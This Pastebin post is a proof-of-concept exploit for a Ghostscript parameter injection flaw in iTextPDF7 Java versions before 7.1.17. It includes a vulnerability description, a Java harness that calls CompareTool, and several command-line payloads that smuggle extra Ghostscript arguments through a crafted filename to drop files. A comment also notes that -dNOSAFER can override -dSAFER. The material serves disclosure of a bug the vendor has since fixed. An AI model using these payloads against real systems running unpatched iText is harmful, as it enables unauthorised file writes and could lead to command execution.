Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /*
- Title: iTextPDF7 Java Ghostscript Parameter Injection
- Software: iTextPDF7 (Java version)
- Version: <7.1.17
- Vulnerability: Parameter Injection
- Credits: Gabriele Zuddas (gzuddas[_@t_]mentat.is)
- Description: An attacker controlling the filename passed to the CompareTool class, is able to inject arbitrary parameters in the command line being executed (ghostscript). The vulnerable code resides inside the com/itextpdf/io/util/GhostscriptHelper.java.
- Notes: Vendor quickly acknowledged and fixed the vulnerability starting from version 7.1.17 (https://github.com/itext/itext7/releases/tag/7.1.17)
- */
- //To compile: javac -cp ".:*" Example.java
- //PoC Payload: ITEXT_GS_EXEC=/usr/bin/gs java -cp ".:*" Example 'a.pdf" -sstdout=hi.txt # '
- import com.itextpdf.kernel.utils.CompareTool;
- //Parameter injection: javac -cp ".:*" Example.java; ITEXT_GS_EXEC=/usr/bin/gs java -cp ".:*" Example "a.pdf\\\" -?"
- // javac -cp ".:*" Example.java; ITEXT_GS_EXEC=/usr/bin/gs java -cp ".:*" Example "xxx.pdf\" - \0"
- public class Example {
- public static void main(String args[]) throws Exception {
- CompareTool c = new CompareTool();
- c.compareVisually("a.pdf", args[0], ".", ".", null);
- }
- }
- //$ITEXT_GS_EXEC -dSAFER -dNOPAUSE -dBATCH -sDEVICE=png16m -r150 -sOutputFile="./cmp_xxx.pdf" - yyyyy-%03d.png" "xxx.pdf" - yyyyy"
- //-dNOSAFER overrides -dSAFER
- //javac -cp ".:*" Example.java; ITEXT_GS_EXEC=/usr/bin/gs java -cp ".:*" Example "xxx.pdf\" -sstdout=a.txt"
- //DROPS a file called 'a.txt-%03d.png\ xxx.pdf\ -sstdout=a.txt' on the filesystem
Advertisement
Add Comment
Please, Sign In to add comment
